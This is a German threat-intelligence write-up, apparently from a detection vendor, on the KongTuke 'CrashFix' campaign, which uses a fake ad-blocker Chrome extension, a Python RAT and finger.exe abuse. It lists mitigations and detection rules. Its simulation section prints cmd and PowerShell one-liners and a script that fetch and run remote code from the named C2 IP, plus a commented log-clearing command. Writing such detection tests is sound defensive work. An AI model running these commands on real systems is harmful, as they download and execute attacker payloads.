SOC Prime Bias: Kritisch

21 Jan 2026 16:34 UTC

Analyse von CrashFix: KongTukes neues Spielzeug

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
Analyse von CrashFix: KongTukes neues Spielzeug
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

KongTuke verteilte eine bösartige Chrome-Erweiterung namens NexShield, die uBlock Origin Lite nachahmt. Nach der Installation zeigt sie eine “CrashFix”-Sicherheitswarnung an, um einen legitimen Browser-Sicherheitsvorfall zu simulieren, bringt den Browser zum Absturz und zwingt den Benutzer, einen bösartigen PowerShell-Befehl auszuführen, der in die Zwischenablage kopiert wurde. Die Kampagne setzt ein Python-RAT, ModellRAT, auf systemgebundenen Domänen und eine mehrstufige PowerShell-Kette auf eigenständigen Hosts ein.

Untersuchung

Analysten von Huntress überprüften den Code der Erweiterung, verknüpften Command-and-Control mit nexsnield.com und übertrugen die Payloads zurück. Sie beobachteten den Missbrauch von finger.exe als LOLBin, um Anweisungen des Angreifers abzurufen, sowie einen DGA, der .top-Domains generiert. Für Domänenumgebungen identifizierten die Forscher ein mit RC4 verschlüsseltes Python-Implantat, das über den HKCU Run-Schlüssel persistiert. Weitere Taktiken umfassten Anti-Analyse-Checks, AMSI-Umgehungen, und Taktiken der Ressourcenerschöpfung, um Benutzer unter Druck zu setzen, umgehend voll Compliance zu zeigen.

Abschwächung

Blockieren Sie die Chrome-Erweiterungs-ID und überwachen Sie unbekannte Erweiterungen, die beliebte Werbeblocker nachahmen. Erkennen Sie Beaconing zu nexsnield.com, den C2-IPs und DGA-erzeugten Domains. Wenden Sie Ausführungskontrollen an, um LOLBin-Nutzung (einschließlich finger.exe) zu beschränken, und alarmieren Sie bei verdächtigen Run-Schlüsselwerten, insbesondere bei Namen, die weit verbreiteter Software ähneln.

Reaktion

Alarmieren Sie bei NexShield-bezogenen Erweiterungsinstallationen und korrelieren Sie mit ausgehenden Verbindungen zur identifizierten C2- und DGA-Infrastruktur. Isolieren Sie betroffene Hosts und sammeln Sie Erweiterungsartefakte, Registry-Runschlüssel, geplante Aufgaben und abgelegte Dateien. Entfernen Sie die ModellRAT-Persistenz, beseitigen Sie PowerShell-Stufenkomponenten und sanieren Sie den Endpunkt und überprüfen Sie die Validität.

Angriffsfluss

Erkennungen

Rufe verdächtige .NET-Methoden von Powershell aus (über powershell) an

SOC Prime Team
21. Jan 2026

Verdächtige CURL-Nutzung (über cmdline)

SOC Prime Team
21. Jan 2026

Kurzer Dateiname (über cmdline)

SOC Prime Team
21. Jan 2026

Mögliche manuelle oder skriptbasierte Operationen wurden in ungewöhnlichen Ordnern durchgeführt (über cmdline)

SOC Prime Team
21. Jan 2026

Verdächtige PowerShell-Strings (über powershell)

SOC Prime Team
21. Jan 2026

Rufe verdächtige Windows-API-Funktionen von Powershell aus (über powershell) an

SOC Prime Team
21. Jan 2026

Mögliche Persistenzpunkte [ASEPs – Software/NTUSER Hive] (über registry_event)

SOC Prime Team
21. Jan 2026

Ein Archiv wurde in verdächtiges Verzeichnis mit PowerShell extrahiert (über powershell)

SOC Prime Team
21. Jan 2026

Python-Ausführung aus verdächtigen Ordnern (über cmdline)

SOC Prime Team
21. Jan 2026

Mögliche Indikatoren für PowerShell-Verschleierung (über powershell)

SOC Prime Team
21. Jan 2026

Mögliche Systemabfragen (über cmdline)

SOC Prime Team
21. Jan 2026

Download oder Upload über PowerShell (über cmdline)

SOC Prime Team
21. Jan 2026

IOCs (SourceIP) zum Erkennen: Dissecting CrashFix: KongTukes neues Werkzeug

SOC Prime AI-Regeln
21. Jan 2026

IOCs (HashSha256) zum Erkennen: Dissecting CrashFix: KongTukes neues Werkzeug

SOC Prime AI-Regeln
21. Jan 2026

IOCs (DestinationIP) zum Erkennen: Dissecting CrashFix: KongTukes neues Werkzeug

SOC Prime AI-Regeln
21. Jan 2026

IOCs (E-Mails) zum Erkennen: Dissecting CrashFix: KongTukes neues Werkzeug

SOC Prime AI-Regeln
21. Jan 2026

KongTuke CrashFix bösartigen Befehlsausführung erkennen [Windows Process Creation]

SOC Prime AI-Regeln
21. Jan 2026

Erkennung von AMSI-Umgehung und Beweismittelentfernung über PowerShell [Windows PowerShell]

SOC Prime AI-Regeln
21. Jan 2026

Simulation Execution

Voraussetzung: Das Telemetrie- und Basislinien-Vorflug-Check muss bestanden haben.

Rationale: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die von der Erkennungslogik erwartete Telemetrie zu erzeugen.

  • Angriffs-Narrativ und Befehle:
    Der Angreifer kopiert zunächst das legitime finger.exe Binary in das temporäre Verzeichnis, benennt es in ct.exeum, und verwendet dann eine verschachtelte cmd /c Kette, um das kopierte Binary mit einem manipulierten Argument auszuführen, das einen Remote-C2-Server kontaktiert (199.217.98.108). Das Binary streamt das Payload zurück in die Befehlszeile, die dann in eine zweite versteckte cmd die den empfangenen Code ausführt, weitergeleitet wird. Danach nutzt der Angreifer PowerShell, um ein sekundäres Payload über Invoke-WebRequest herunterzuladen und führt es sofort mit iexaus. Alle Schritte erfolgen mit minimaler Benutzeroberfläche (/min), um eine Benutzerdetektion zu vermeiden.

     1. Kopiere finger.exe → %TEMP%ct.exe
      2. Führe aus: cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"
      3. PowerShell Download & Ausführung des sekundären Payloads:
         powershell -NoProfile -WindowStyle Hidden -Command "iex (Invoke-WebRequest -Uri 'http://199.217.98.108/payload.ps1' -UseBasicParsing).Content"
  • Regressionstest-Skript: Das untenstehende Skript reproduziert die gesamte Angriffskette auf einer Windows-Testmaschine. Führen Sie es in einer erhöhten PowerShell-Sitzung aus.

    #-------------------------------------------------
    # KongTuke CrashFix bösartigen Befehlsausführung
    #-------------------------------------------------
    # 1. Verteile den LOLBin (finger.exe) in %TEMP% als ct.exe
    $fingerPath = "$env:windirsystem32finger.exe"
    $tempExe    = "$env:TEMPct.exe"
    Copy-Item -Path $fingerPath -Destination $tempExe -Force
    
    # 2. Führe die bösartige cmd-Kette aus (übereinstimmend mit Sigma-Regel)
    $maliciousCmd = 'cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"'
    Start-Process -FilePath "cmd.exe" -ArgumentList "/c $maliciousCmd" -WindowStyle Hidden
    
    # 3. PowerShell Web-Download-Ausführung des sekundären Payloads
    $payloadUrl = 'http://199.217.98.108/payload.ps1'
    $psCommand  = "iex (Invoke-WebRequest -Uri `'$payloadUrl`' -UseBasicParsing).Content"
    Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `$psCommand`" -WindowStyle Hidden
    #-------------------------------------------------
  • Bereinigungskommandos: Entfernen Sie Artefakte und beenden Sie alle verbleibenden Prozesse, die durch den Test erstellt wurden.

    # Lösche die kopierte ct.exe
    Remove-Item -Path "$env:TEMPct.exe" -ErrorAction SilentlyContinue
    
    # Beenden Sie alle umherstreifenden cmd.exe- oder powershell.exe-Prozesse, die vom Test gestartet wurden (nach bestimmten Befehlszeilen filtern)
    Get-WmiObject Win32_Process |
        Where-Object { $_.CommandLine -match 'finger.exe|199.217.98.108' } |
        ForEach-Object { $_.Terminate() }
    
    # Optional: Event-Log löschen, falls für Wiederholbarkeit erforderlich
    # wevlutil cl Security